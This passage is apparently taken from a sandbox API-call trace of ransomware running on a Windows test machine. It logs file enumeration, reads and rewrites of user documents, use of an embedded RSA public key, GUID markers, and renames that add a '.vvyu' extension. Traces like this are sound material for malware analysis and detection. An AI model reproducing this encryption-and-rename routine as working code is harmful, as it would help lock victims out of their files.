lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.442] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0xc296, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0xc296, lpOverlapped=0x0) returned 1 [0199.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0199.443] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc29b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.444] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.444] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.445] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.445] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.445] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.445] CloseHandle (hObject=0x584) returned 1 [0199.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x2af3f88 [0199.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33f3b0 | out: hHeap=0x2c0000) returned 1 [0199.448] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\h0-NgmZ.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\h0-ngmz.odt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\h0-NgmZ.odt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\h0-ngmz.odt.vvyu")) returned 1 [0199.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.449] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.449] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381bd0 | out: hHeap=0x2c0000) returned 1 [0199.452] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xed86fe00, ftCreationTime.dwHighDateTime=0x1d89ccf, ftLastAccessTime.dwLowDateTime=0xa5460440, ftLastAccessTime.dwHighDateTime=0x1d8a5e6, ftLastWriteTime.dwLowDateTime=0xa5460440, ftLastWriteTime.dwHighDateTime=0x1d8a5e6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IcyHH4kvUj6MCZmB", cAlternateFileName="ICYHH4~1")) returned 1 [0199.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0199.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29addc8 [0199.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0199.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x33f3b0 [0199.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3aa000 [0199.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8eb8 | out: hHeap=0x2c0000) returned 1 [0199.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d010 | out: hHeap=0x2c0000) returned 1 [0199.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9248 | out: hHeap=0x2c0000) returned 1 [0199.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0199.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29ade80 [0199.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29addc8 | out: hHeap=0x2c0000) returned 1 [0199.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0199.453] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xde0dfd50, ftCreationTime.dwHighDateTime=0x1d8a474, ftLastAccessTime.dwLowDateTime=0x5a55af40, ftLastAccessTime.dwHighDateTime=0x1d8a5b8, ftLastWriteTime.dwLowDateTime=0x5a55af40, ftLastWriteTime.dwHighDateTime=0x1d8a5b8, nFileSizeHigh=0x0, nFileSizeLow=0x18001, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NS2nMI.pptx", cAlternateFileName="NS2NMI~1.PPT")) returned 1 [0199.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8eb8 [0199.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x381bd0 [0199.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8eb8 | out: hHeap=0x2c0000) returned 1 [0199.454] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\NS2nMI.pptx") returned=".pptx" [0199.454] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\NS2nMI.pptx" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\ns2nmi.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.455] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=98305) returned 1 [0199.455] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.458] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x17fdb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.459] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.461] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.461] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x18001, lpOverlapped=0x0) returned 1 [0199.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.462] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31ba80) returned 1 [0199.463] CryptCreateHash (in: hProv=0x31ba80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.463] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.463] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.464] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.464] GetLastError () returned 0x0 [0199.464] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.464] CryptReleaseContext (hProv=0x31ba80, dwFlags=0x0) returned 1 [0199.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.464] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.464] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.464] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18000) returned 0x2af7168 [0199.465] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade8f0 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a58 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade938 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a70 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6aa0 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ab8 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.466] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0199.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0199.467] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ab8 [0199.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6aa0 [0199.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0199.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0199.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.469] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0199.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.470] GetCurrentThreadId () returned 0x5d8 [0199.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5cc0 [0199.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0199.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0199.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.471] GetCurrentThreadId () returned 0x5d8 [0199.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6b00 [0199.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6aa0 [0199.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0199.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ab8 [0199.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0199.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a88 [0199.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b18 [0199.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0199.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0199.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ad0 [0199.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b30 [0199.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ad0 [0199.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0199.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 